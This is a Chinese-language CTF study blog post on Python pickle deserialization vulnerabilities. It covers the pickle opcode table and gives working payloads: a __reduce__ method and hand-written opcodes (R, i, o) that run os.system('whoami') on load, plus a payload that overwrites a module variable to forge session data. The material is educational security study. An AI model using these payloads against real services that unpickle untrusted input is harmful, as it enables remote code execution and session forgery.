<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>pickle反序列化学习 | Sauy&#39;s corner</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="前置知识详细前置知识可以看官方文档https:&#x2F;&#x2F;docs.python.org&#x2F;zh-cn&#x2F;3&#x2F;library&#x2F;pickle.html Pickle–Python对象反序列化Pickle1234pickle是python里一个可以对一个 Python 对象结构的二进制序列化和反序列化的模块。&quot;pickling&quot; 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过">
<meta property="og:type" content="article">
<meta property="og:title" content="pickle反序列化学习">
<meta property="og:url" content="http://example.com/2025/04/10/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Sauy&#39;s corner">
<meta property="og:description" content="前置知识详细前置知识可以看官方文档https:&#x2F;&#x2F;docs.python.org&#x2F;zh-cn&#x2F;3&#x2F;library&#x2F;pickle.html Pickle–Python对象反序列化Pickle1234pickle是python里一个可以对一个 Python 对象结构的二进制序列化和反序列化的模块。&quot;pickling&quot; 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="d:\Blog\source\images\v2-5e2eeae4c4943c31aee406fa3b467301_720w.png">
<meta property="article:published_time" content="2025-04-10T08:10:58.000Z">
<meta property="article:modified_time" content="2025-04-11T06:04:57.326Z">
<meta property="article:author" content="Sauy">
<meta property="article:tag" content="CTF学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="d:\Blog\source\images\v2-5e2eeae4c4943c31aee406fa3b467301_720w.png">
  
    <link rel="alternate" href="/atom.xml" title="Sauy's corner" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Sauy&#39;s corner</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS 订阅"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="搜索"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-pickle反序列化" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/04/10/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="article-date">
  <time class="dt-published" datetime="2025-04-10T08:10:58.000Z" itemprop="datePublished">2025-04-10</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      pickle反序列化学习
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><p>详细前置知识可以看官方文档<a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/library/pickle.html">https://docs.python.org/zh-cn/3/library/pickle.html</a></p>
<h3 id="Pickle–Python对象反序列化"><a href="#Pickle–Python对象反序列化" class="headerlink" title="Pickle–Python对象反序列化"></a>Pickle–Python对象反序列化</h3><h4 id="Pickle"><a href="#Pickle" class="headerlink" title="Pickle"></a>Pickle</h4><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pickle是python里一个可以对一个 Python 对象结构的二进制序列化和反序列化的模块。</span><br><span class="line">&quot;pickling&quot; 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过程，而 &quot;unpickling&quot; 是相反的操作</span><br><span class="line"></span><br><span class="line">pickel可以看作一种独立的栈语言，其对opcode的编写可以进行python代码执行、变量覆盖等操作。</span><br></pre></td></tr></table></figure>

<h4 id="pickle序列化和反序列化"><a href="#pickle序列化和反序列化" class="headerlink" title="pickle序列化和反序列化"></a>pickle序列化和反序列化</h4><p>对象 &lt;–&gt; 二进制字节流 </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Person</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="variable language_">self</span>.age=<span class="number">18</span></span><br><span class="line">        <span class="variable language_">self</span>.name=<span class="string">&quot;A&quot;</span></span><br><span class="line"> </span><br><span class="line">p=Person()</span><br><span class="line">opcode=pickle.dumps(p)</span><br><span class="line"><span class="built_in">print</span>(opcode)</span><br><span class="line"> </span><br><span class="line">P=pickle.loads(opcode)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;The age is:&#x27;</span>+<span class="built_in">str</span>(P.age),<span class="string">&#x27;The name is:&#x27;</span>+P.name)   //P.age 是调用age成员 P.name 是调用name成员</span><br></pre></td></tr></table></figure>

<p>pickle.dumps将对象序列化为二进制字节流</p>
<p>pickle.loads将二进制字节流化为对象</p>
<h2 id="Pickle反序列化漏洞"><a href="#Pickle反序列化漏洞" class="headerlink" title="Pickle反序列化漏洞"></a>Pickle反序列化漏洞</h2><p>成因:就是在<strong>二进制字节流</strong>上做手脚 就像php反序列化我们传入序列化后的字符串来达到我们想要的目标</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Person</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="variable language_">self</span>.age=<span class="number">18</span></span><br><span class="line">        <span class="variable language_">self</span>.name=<span class="string">&quot;A&quot;</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        command=<span class="string">r&quot;whoami&quot;</span></span><br><span class="line">        <span class="keyword">return</span> (os.system,(command,))</span><br><span class="line"> </span><br><span class="line">p=Person()</span><br><span class="line">opcode=pickle.dumps(p)</span><br><span class="line"><span class="built_in">print</span>(opcode)</span><br><span class="line"> </span><br><span class="line">P=pickle.loads(opcode)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;The age is:&#x27;</span>+<span class="built_in">str</span>(P.age),<span class="string">&#x27;The name is:&#x27;</span>+P.name)</span><br></pre></td></tr></table></figure>

<p>特殊函数<code>__reduce__</code> return 一个元组 第一个是可调用对象 第二个是一个参数元组</p>
<p>在pickle.loads的时候就会执行os.system(“whoami”) 那就成功执行任意python代码了</p>
<h2 id="Pickle工作原理"><a href="#Pickle工作原理" class="headerlink" title="Pickle工作原理"></a>Pickle工作原理</h2><p>独立的栈语言，由一串串opcode组成。语言解析依靠Pickle Virtual Machine(PVM)进行。</p>
<ul>
<li>指令处理器：从流中读取 <code>opcode</code> 和参数，并对其进行解释处理。重复这个动作，直到遇到 . 这个结束符后停止。 最终留在栈顶的值将被作为反序列化对象返回。</li>
<li>stack：由 Python 的 <strong><code>list</code></strong> 实现，被用来临时存储数据、参数以及对象。</li>
<li>memo：由 Python 的 <strong><code>dict</code></strong> 实现，为 PVM 的整个生命周期提供存储。</li>
</ul>
<p><img src="D:\Blog\source\images\v2-5e2eeae4c4943c31aee406fa3b467301_720w.png"></p>
<h3 id="常用opcode指令"><a href="#常用opcode指令" class="headerlink" title="常用opcode指令"></a>常用opcode指令</h3><table>
<thead>
<tr>
<th align="left">指令</th>
<th align="center">描述</th>
<th align="center">具体写法</th>
<th align="center">栈上的变化</th>
</tr>
</thead>
<tbody><tr>
<td align="left">c</td>
<td align="center">获取一个全局对象或import一个模块</td>
<td align="center">c[module]\n[instance]\n</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="left">o</td>
<td align="center">寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）</td>
<td align="center">o</td>
<td align="center">这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈</td>
</tr>
<tr>
<td align="left">i</td>
<td align="center">相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）</td>
<td align="center">i[module]\n[callable]\n</td>
<td align="center">这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈</td>
</tr>
<tr>
<td align="left">N</td>
<td align="center">实例化一个None</td>
<td align="center">N</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="left">S</td>
<td align="center">实例化一个字符串对象</td>
<td align="center">S’xxx’\n（也可以使用双引号、&#39;等python字符串形式）</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="left">V</td>
<td align="center">实例化一个UNICODE字符串对象</td>
<td align="center">Vxxx\n</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="left">I</td>
<td align="center">实例化一个int对象</td>
<td align="center">Ixxx\n</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="left">F</td>
<td align="center">实例化一个float对象</td>
<td align="center">Fx.x\n</td>
<td align="center">获得的对象入栈</td>
</tr>
<tr>
<td align="left">R</td>
<td align="center">选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数</td>
<td align="center">R</td>
<td align="center">函数和参数出栈，函数的返回值入栈</td>
</tr>
<tr>
<td align="left">.</td>
<td align="center">程序结束，栈顶的一个元素作为pickle.loads()的返回值</td>
<td align="center">.</td>
<td align="center">无</td>
</tr>
<tr>
<td align="left">(</td>
<td align="center">向栈中压入一个MARK标记</td>
<td align="center">(</td>
<td align="center">MARK标记入栈</td>
</tr>
<tr>
<td align="left">t</td>
<td align="center">寻找栈中的上一个MARK，并组合之间的数据为元组</td>
<td align="center">t</td>
<td align="center">MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td align="left">)</td>
<td align="center">向栈中直接压入一个空元组</td>
<td align="center">)</td>
<td align="center">空元组入栈</td>
</tr>
<tr>
<td align="left">l</td>
<td align="center">寻找栈中的上一个MARK，并组合之间的数据为列表</td>
<td align="center">l</td>
<td align="center">MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td align="left">]</td>
<td align="center">向栈中直接压入一个空列表</td>
<td align="center">]</td>
<td align="center">空列表入栈</td>
</tr>
<tr>
<td align="left">d</td>
<td align="center">寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）</td>
<td align="center">d</td>
<td align="center">MARK标记以及被组合的数据出栈，获得的对象入栈</td>
</tr>
<tr>
<td align="left">}</td>
<td align="center">向栈中直接压入一个空字典</td>
<td align="center">}</td>
<td align="center">空字典入栈</td>
</tr>
<tr>
<td align="left">p</td>
<td align="center">将栈顶对象储存至memo_n</td>
<td align="center">pn\n</td>
<td align="center">无</td>
</tr>
<tr>
<td align="left">g</td>
<td align="center">将memo_n的对象压栈</td>
<td align="center">gn\n</td>
<td align="center">对象被压栈</td>
</tr>
<tr>
<td align="left">0</td>
<td align="center">丢弃栈顶对象</td>
<td align="center">0</td>
<td align="center">栈顶对象被丢弃</td>
</tr>
<tr>
<td align="left">b</td>
<td align="center">使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置</td>
<td align="center">b</td>
<td align="center">栈上第一个元素出栈</td>
</tr>
<tr>
<td align="left">s</td>
<td align="center">将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中</td>
<td align="center">s</td>
<td align="center">第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新</td>
</tr>
<tr>
<td align="left">u</td>
<td align="center">寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中</td>
<td align="center">u</td>
<td align="center">MARK标记以及被组合的数据出栈，字典被更新</td>
</tr>
<tr>
<td align="left">a</td>
<td align="center">将栈的第一个元素append到第二个元素(列表)中</td>
<td align="center">a</td>
<td align="center">栈顶元素出栈，第二个元素（列表）被更新</td>
</tr>
<tr>
<td align="left">e</td>
<td align="center">寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中</td>
<td align="center">e</td>
<td align="center">MARK标记以及被组合的数据出栈，列表被更新</td>
</tr>
</tbody></table>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"> </span><br><span class="line">opcode=<span class="string">b&#x27;&#x27;&#x27;cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tR.&#x27;&#x27;&#x27;</span></span><br><span class="line">pickle.loads(opcode)</span><br></pre></td></tr></table></figure>

<p>运行以上代码就会执行whoami命令 </p>
<h3 id="pickletools"><a href="#pickletools" class="headerlink" title="pickletools"></a>pickletools</h3><p>用这个模块可以把opcode转换成我们易读的形式</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"></span><br><span class="line">opcode = <span class="string">b&#x27;&#x27;&#x27;cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tR.&#x27;&#x27;&#x27;</span></span><br><span class="line">pickletools.dis(opcode)</span><br></pre></td></tr></table></figure>

<p>得</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">    <span class="number">0</span>: c    GLOBAL     <span class="string">&#x27;os system&#x27;</span></span><br><span class="line">   <span class="number">11</span>: (    MARK</span><br><span class="line">   <span class="number">12</span>: S        STRING     <span class="string">&#x27;whoami&#x27;</span></span><br><span class="line">   <span class="number">22</span>: t        TUPLE      (MARK at <span class="number">11</span>)</span><br><span class="line">   <span class="number">23</span>: R    REDUCE</span><br><span class="line">   <span class="number">24</span>: .    STOP</span><br><span class="line">highest protocol among opcodes = <span class="number">0</span></span><br></pre></td></tr></table></figure>

<h2 id="Opcode漏洞利用"><a href="#Opcode漏洞利用" class="headerlink" title="Opcode漏洞利用"></a>Opcode漏洞利用</h2><h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>opcode可以执行多个命令，可以通过手写的方式来达到。</p>
<p>opcode中，**.**是程序结束的标志，我们可以通过去掉.将两个字节流拼接在一起。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"> </span><br><span class="line">opcode=<span class="string">b&#x27;&#x27;&#x27;cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tRcos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tR.&#x27;&#x27;&#x27;</span></span><br><span class="line">pickle.loads(opcode)</span><br><span class="line"><span class="comment">#就会执行两次whoami命令</span></span><br></pre></td></tr></table></figure>

<h4 id="注意！"><a href="#注意！" class="headerlink" title="注意！"></a>注意！</h4><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">部分Linux系统下和Windows下的opcode字节流并不兼容，比如Windows下执行系统命令函数为os.system()，在部分Linux下则为posix.system()。</span><br><span class="line">所以有时候linux和win下的脚本运行结果是不同的。</span><br></pre></td></tr></table></figure>

<p><code>R</code> <code>i</code> <code>o</code> 这是三个执行函数的字节码</p>
<p><code>R</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">opcode1=<span class="string">b&#x27;&#x27;&#x27;cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tR.&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p><code>i</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">opcode2=<span class="string">b&#x27;&#x27;&#x27;(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">ios</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">.&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p><code>o</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">opcode3=<span class="string">b&#x27;&#x27;&#x27;(cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">o.&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h3><p>在session或token中，由于需要存储一些用户信息，所以我们常常能够看见pickle的身影。程序会将用户的各种信息序列化并存储在session或token中，以此来验证用户的身份。所以pickle可以进行session伪造，来变量覆盖。</p>
<p>实验:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#test.py</span></span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> secret</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;secret变量的值为:&quot;</span> + secret.secret)</span><br><span class="line"></span><br><span class="line">opcode = <span class="string">b&#x27;&#x27;&#x27;c__main__</span></span><br><span class="line"><span class="string">secret</span></span><br><span class="line"><span class="string">(S&#x27;secret&#x27;</span></span><br><span class="line"><span class="string">S&#x27;Hack!!!&#x27;</span></span><br><span class="line"><span class="string">db.&#x27;&#x27;&#x27;</span></span><br><span class="line">fake = pickle.loads(opcode)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;secret变量的值为:&quot;</span> + fake.secret)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#secret.py</span></span><br><span class="line">secret = <span class="string">&quot;This is a key&quot;</span></span><br></pre></td></tr></table></figure>

<p>这样就可以成功覆盖原来的secret</p>
<p>pickle暂时先学到这里吧<del>笔者觉得学再多的理论还是得应用，如果以后有什么新的东西就再来补坑</del>🤭</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/04/10/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" data-id="cmaatsm97000e60dmb0qlhg9a" data-title="pickle反序列化学习" class="article-share-link"><span class="fa fa-share">分享</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF%E5%AD%A6%E4%B9%A0/" rel="tag">CTF学习</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/04/14/TGCTF2025-WEB/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">前一篇</strong>
      <div class="article-nav-title">
        
          TGCTF2025-WEB WP
        
      </div>
    </a>
  
  
    <a href="/2025/04/10/%E8%9C%80%E9%81%93%E5%B1%B12024-wp/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">蜀道山2024wp</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF-wp/" rel="tag">CTF-wp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF%E5%AD%A6%E4%B9%A0/" rel="tag">CTF学习</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0/" rel="tag">渗透学习</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF-wp/" style="font-size: 20px;">CTF-wp</a> <a href="/tags/CTF%E5%AD%A6%E4%B9%A0/" style="font-size: 20px;">CTF学习</a> <a href="/tags/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0/" style="font-size: 10px;">渗透学习</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/05/">五月 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/04/">四月 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/05/05/2025-05-05-HTB-Heal/">HTB-Heal</a>
          </li>
        
          <li>
            <a href="/2025/04/27/CBC%E5%AD%97%E8%8A%82%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB/">CBC字节翻转攻击</a>
          </li>
        
          <li>
            <a href="/2025/04/24/HTB-Practice/">HTB-Code</a>
          </li>
        
          <li>
            <a href="/2025/04/20/python%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/">浅谈python内存马</a>
          </li>
        
          <li>
            <a href="/2025/04/14/TGCTF2025-WEB/">TGCTF2025-WEB WP</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 Sauy<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>